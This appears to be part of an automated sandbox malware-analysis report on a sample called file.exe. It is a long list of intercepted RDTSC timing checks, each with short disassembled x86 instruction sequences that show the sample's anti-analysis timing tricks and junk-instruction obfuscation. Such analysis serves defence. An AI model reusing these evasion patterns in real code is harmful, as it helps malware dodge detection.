Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6987EF second address: 6987F9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6E64DC24B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69913F second address: 699145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 699912 second address: 699916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A07EA second address: 6A07FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a jc 00007F6E644F753Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A07FC second address: 6A082E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E64DC24BEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F6E64DC24C8h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A082E second address: 6A0845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E644F7533h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A0845 second address: 6A0849 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A0374 second address: 6A037A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6A04E6 second address: 6A04EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6B0777 second address: 6B0782 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6B0782 second address: 6B0792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6E64DC24B6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6B80D0 second address: 6B80DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F6E644F7528h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C10C2 second address: 6C10C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C10C8 second address: 6C10E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F7534h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C10E0 second address: 6C10E7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C47CF second address: 6C47D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C7D51 second address: 6C7D56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C7B68 second address: 6C7B86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7538h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C7B86 second address: 6C7BB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C5h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6E64DC24C6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CE538 second address: 6CE53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CE53E second address: 6CE542 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CE542 second address: 6CE552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6E644F752Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CE552 second address: 6CE557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CCD81 second address: 6CCD85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CCD85 second address: 6CCD89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CCD89 second address: 6CCDA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 je 00007F6E644F752Eh 0x0000000e jg 00007F6E644F7526h 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CCF53 second address: 6CCF57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CCF57 second address: 6CCF6A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F6E644F752Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CD0CC second address: 6CD0D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F6E64DC24B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CD0D6 second address: 6CD0EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7532h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CE222 second address: 6CE237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F6E64DC24BBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6D1421 second address: 6D143F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7534h 0x00000007 jc 00007F6E644F7526h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6D7554 second address: 6D755E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6D755E second address: 6D7562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6D9846 second address: 6D984A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6D984A second address: 6D985F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F752Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6DAE1C second address: 6DAE22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6DAE22 second address: 6DAE2D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6DAE2D second address: 6DAE33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E12D4 second address: 6E12E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F752Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E12E4 second address: 6E1305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6E64DC24C4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E1305 second address: 6E1309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6EDCAE second address: 6EDCB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6F2EEF second address: 6F2F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F7538h 0x00000009 jnc 00007F6E644F7526h 0x0000000f popad 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jc 00007F6E644F7526h 0x0000001e push edx 0x0000001f pop edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6F2F22 second address: 6F2F26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6F2F26 second address: 6F2F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6F2F2C second address: 6F2F3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E64DC24BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6F2F3D second address: 6F2F52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7531h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6F29F2 second address: 6F2A10 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F6E64DC24BCh 0x00000008 pop edx 0x00000009 push ecx 0x0000000a jmp 00007F6E64DC24BBh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6F2A10 second address: 6F2A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 je 00007F6E644F7526h 0x0000000f jmp 00007F6E644F7531h 0x00000014 jmp 00007F6E644F7533h 0x00000019 jmp 00007F6E644F7537h 0x0000001e popad 0x0000001f pushad 0x00000020 jc 00007F6E644F7526h 0x00000026 jp 00007F6E644F7526h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6F8B84 second address: 6F8B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E64DC24BEh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6F8E67 second address: 6F8E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6F8E6D second address: 6F8E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6F8E71 second address: 6F8E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6F8E75 second address: 6F8E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6F8E85 second address: 6F8EA0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007F6E644F7526h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d je 00007F6E644F755Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007F6E644F7526h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6F901E second address: 6F9033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 js 00007F6E64DC24B6h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6F9187 second address: 6F919B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F6E644F7532h 0x0000000c js 00007F6E644F7526h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FC905 second address: 6FC909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FCACD second address: 6FCAD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FCB59 second address: 6FCB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 nop 0x00000007 movzx edx, cx 0x0000000a push 00000004h 0x0000000c jng 00007F6E64DC24B9h 0x00000012 call 00007F6E64DC24B9h 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007F6E64DC24B8h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FCB81 second address: 6FCB87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FCB87 second address: 6FCB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FCB8B second address: 6FCBE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F752Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jno 00007F6E644F7528h 0x00000013 push eax 0x00000014 jmp 00007F6E644F7534h 0x00000019 pop eax 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f jmp 00007F6E644F752Fh 0x00000024 mov eax, dword ptr [eax] 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F6E644F752Bh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FCBE0 second address: 6FCBF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FCBF5 second address: 6FCC0E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6E644F752Ch 0x00000008 jp 00007F6E644F7526h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FCC0E second address: 6FCC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A01990 second address: 4A019D5 instructions: 0x00000000 rdtsc 0x00000002 mov bx, BD1Eh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007F6E644F752Fh 0x0000000e xor si, A9CEh 0x00000013 jmp 00007F6E644F7539h 0x00000018 popfd 0x00000019 popad 0x0000001a mov dword ptr [esp], ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push ebx 0x00000021 pop eax 0x00000022 mov dx, 883Ah 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A019D5 second address: 4A019F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E64DC24C7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A019F0 second address: 4A019F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A019F4 second address: 4A01A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call dword ptr [7721188Ch] 0x0000000e mov edi, edi 0x00000010 push ebp 0x00000011 mov ebp, esp 0x00000013 push ecx 0x00000014 mov ecx, dword ptr [7FFE0004h] 0x0000001a mov dword ptr [ebp-04h], ecx 0x0000001d cmp ecx, 01000000h 0x00000023 jc 00007F6E64DF3F95h 0x00000029 mov eax, 7FFE0320h 0x0000002e mov eax, dword ptr [eax] 0x00000030 mul ecx 0x00000032 shrd eax, edx, 00000018h 0x00000036 mov esp, ebp 0x00000038 pop ebp 0x00000039 ret 0x0000003a pushad 0x0000003b jmp 00007F6E64DC24BBh 0x00000040 call 00007F6E64DC24C8h 0x00000045 mov ebx, ecx 0x00000047 pop ecx 0x00000048 popad 0x00000049 pop ecx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d push ecx 0x0000004e pop edi 0x0000004f mov cx, DA11h 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A01A35 second address: 4A01A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E644F752Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A01A43 second address: 4A01A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A01A47 second address: 4A018E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a xor esi, eax 0x0000000c lea eax, dword ptr [ebp-10h] 0x0000000f push eax 0x00000010 call 00007F6E68AEF671h 0x00000015 mov edi, edi 0x00000017 pushad 0x00000018 mov bh, cl 0x0000001a mov ebx, 6D7206EEh 0x0000001f popad 0x00000020 push esp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push edx 0x00000025 pop ecx 0x00000026 mov edx, 0C64079Eh 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A018E0 second address: 4A01901 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A01901 second address: 4A01905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A01905 second address: 4A01909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A01909 second address: 4A0190F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0190F second address: 4A01945 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6E64DC24C2h 0x00000009 and eax, 253FB0C8h 0x0000000f jmp 00007F6E64DC24BBh 0x00000014 popfd 0x00000015 movzx esi, dx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A01945 second address: 4A01949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A01949 second address: 4A0194D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0194D second address: 4A01953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A01953 second address: 4A01959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A01959 second address: 4A0195D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0195D second address: 4A01972 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, 5FA6A935h 0x00000011 mov bx, ax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A01972 second address: 4A01978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A01978 second address: 4A0197C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A01785 second address: 4A017BD instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F6E644F7535h 0x00000010 mov ebp, esp 0x00000012 jmp 00007F6E644F752Eh 0x00000017 pop ebp 0x00000018 pushad 0x00000019 mov cl, F8h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A091D second address: 49A0921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A0921 second address: 49A0925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A0925 second address: 49A092B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49D0711 second address: 49D064F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b mov ax, C1A3h 0x0000000f pushfd 0x00000010 jmp 00007F6E644F7538h 0x00000015 jmp 00007F6E644F7535h 0x0000001a popfd 0x0000001b popad 0x0000001c retn 0008h 0x0000001f push 00401BF4h 0x00000024 push edi 0x00000025 mov dword ptr [0045F81Ch], eax 0x0000002a call esi 0x0000002c mov edi, edi 0x0000002e jmp 00007F6E644F7530h 0x00000033 xchg eax, ebp 0x00000034 pushad 0x00000035 mov al, 77h 0x00000037 push eax 0x00000038 push edx 0x00000039 mov edi, 04A7D05Ch 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B06E8 second address: 49B06F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
